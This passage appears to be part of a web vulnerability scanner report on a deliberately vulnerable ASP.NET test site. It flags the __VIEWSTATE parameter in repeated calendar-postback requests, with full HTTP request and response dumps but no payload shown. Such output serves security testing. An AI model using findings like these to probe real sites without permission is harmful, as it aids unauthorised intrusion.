href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8157&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAb7POK9oIZGRkzk1l6dZPbfALct1SPgbvSM5ajfw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F39PGCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPNF6RRGp0a8Eq4sK7f7Ylg27zkNc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:58 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAb7POK9oIZGRkzk1l6dZPbfALct1SPgbvSM5ajfw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/39PGCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPNF6RRGp0a8Eq4sK7f7Ylg27zkNc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:White" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8161&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAFl3zLtoIZGRk2Nj6jEGwPfwOkexxfPTrW6CO224%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvkPqABwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPyQJJstCgBfDGfqzOeEMGxIeeFSU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:34 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAFl3zLtoIZGRk2Nj6jEGwPfwOkexxfPTrW6CO224=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvkPqABwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPyQJJstCgBfDGfqzOeEMGxIeeFSU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:White" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 